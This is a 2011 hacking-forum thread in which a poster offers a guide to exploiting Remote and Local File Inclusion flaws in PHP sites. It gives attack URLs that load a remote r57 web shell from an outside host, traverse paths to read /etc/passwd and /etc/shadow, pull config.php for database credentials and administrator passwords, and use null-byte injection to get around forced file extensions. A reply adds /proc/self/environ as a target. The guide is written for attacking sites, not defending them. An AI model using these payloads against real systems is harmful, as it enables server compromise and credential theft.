ShadowNET Posted March 20, 2011 Share Posted March 20, 2011 This is a guide I wrote for my board: www.leethackers.org. What is RFI? RFI or also known as Remote File Inclusion can be used to execute php code from a remote host. This can be really useful. For example: www.target.com/index.php?page=index.txt Here we see, it takes the text of the text file: "index.txt" and places it into index.php. It is the include() PHP Function. Sadly, no-one thought about the security while doing this. As I already said, it gets the text of index.txt and places the code into the index.php. What if we change the index.txt to a Remote server for example: www.t00ls.org/r57.txt <--- This is a web shell. So basically, it should look like this now: www.target.com/index.php?page=www.t00ls.org/r57.txt If the target is vulnerable, you should see a web shell on the page without injecting it or uploading a file! That easy. What is LFI? LFI or also known as Local File Inclusion can be used to display sensitive information from a specified file on the webhost. The concept is almost the same like RFI. The only thing that is different, the files are on localhost. For example, we have this page: www.target.com/index.php?page=contact.php So it shows the contact.php form. Now let us try this: www.target.com/index.php?page=../../../etc/passwd If you get a page with users, then this page is vulnerable to LFI. The passwords are displayed as 'x''s though. Try to check the 'shadow' File. So do this: www.target.com/index.php?page=../../../etc/shadow This file is normally not readable for the users. It is only readable for 'root'. What you could try, is getting the config.php file that is mostly located in the include folder. so: www.target.com/index.php?page=./include/config.php If you have got the details for the DB (server, username, password, database) you can connect to it and get the administrator password from the users or w.e table. Hope this small explaination helped you a bit! Quote Link to comment Share on other sites More sharing options...
buffy Posted March 20, 2011 Share Posted March 20, 2011 Nice work dude! Quote Link to comment Share on other sites More sharing options...
dr0p Posted March 25, 2011 Share Posted March 25, 2011 (edited) /proc/self/environ is also very useful for LFI ;D RFI and LFI are pretty rare now though. Edited March 25, 2011 by dr0p Quote Link to comment Share on other sites More sharing options...
ShadowNET Posted March 25, 2011 Author Share Posted March 25, 2011 For some reason I cannot edit my post.. well, here is a small update... PHP coders usually use this code: <?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; include( $color . '.php' ); ?> Now, they think they're safe because the file extension must be ".php", WRONG!. All you have to do is put '' on the end of the URL, this will ignore including 'php' or any other file extension. This is called null byte injection. e.g. www.target.com/index.php?page=../../../etc/shadow%00 I am willing to post this image, because I noticed on IPBoard forums it is getting replaced. So just add this: after the URL. Just after /etc/shadow[NULL BYTE INJ HERE] Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.